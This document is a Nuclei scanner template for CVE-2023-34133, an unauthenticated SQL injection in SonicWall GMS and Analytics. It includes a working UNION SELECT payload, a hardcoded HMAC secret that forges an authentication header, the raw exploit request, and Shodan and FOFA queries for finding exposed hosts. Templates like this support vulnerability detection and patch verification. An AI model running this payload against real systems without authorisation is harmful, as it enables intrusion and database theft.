Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
PoC代码[已公开]
id: CVE-2023-34133
info:
name: SonicWall GMS and Analytics - SQL Injection
author: theamanrawat
severity: high
description: |
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in SonicWall GMS and Analytics allows an unauthenticated attacker to extract sensitive information from the application database. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system.
remediation: |
Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability.
reference:
- https://raw.githubusercontent.com/rapid7/metasploit-framework/4b130f5be7590d04878f3bda37555e59e733324d/modules/exploits/multi/http/sonicwall_shell_injection_cve_2023_34124.rb
- https://www.sonicwall.com/support/product-notification/urgent-security-notice-sonicwall-gms-analytics-impacted-by-suite-of-vulnerabilities/230710150218060/
- https://github.com/getdrive/PoC/blob/main/2023/Sonicwall_Shell_Injection/sonicwall_shell_injection_cve_2023_34124.rb
- https://nvd.nist.gov/vuln/detail/CVE-2023-34133
- http://packetstormsecurity.com/files/174571/Sonicwall-GMS-9.9.9320-Remote-Code-Execution.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-34133
cwe-id: CWE-89
epss-score: 0.86001
epss-percentile: 0.99345
cpe: cpe:2.3:a:sonicwall:analytics:*:*:*:*:*:*:*:*
metadata:
max-request: 4
vendor: sonicwall
product: analytics
shodan-query: http.favicon.hash:"-1381126564"
fofa-query: icon_hash="-1381126564"
tags: cve2023,cve,sonicwall,sqli,injection,vkev,vuln
variables:
num: "999999999"
query: "' union select (select ID from SGMSDB.DOMAINS), '', '', '', '', '', (select MD5({{num}})),'', '', '"
secret: '?~!@#$%^^()'
auth: "{{hmac('sha1', query, secret)}}"
http:
- raw:
- |
GET /ws/msw/tenant/{{url_encode(query)}} HTTP/1.1
Host: {{Hostname}}
Auth: {"user": "system", "hash": "{{base64(hex_decode(auth))}}"}
matchers:
- type: word
part: body
words:
- '{{md5(num)}}'
# digest: 4a0a004730450220615907f927705d5eb689304ec4be85d6c0663674a40c19d341aa9991d0aabd11022100ae0697af7ba6148b8c048eff6e5d380635eaa3d7f19c713c732d37670343d806:922c64590222798bb761d5b6d8e72950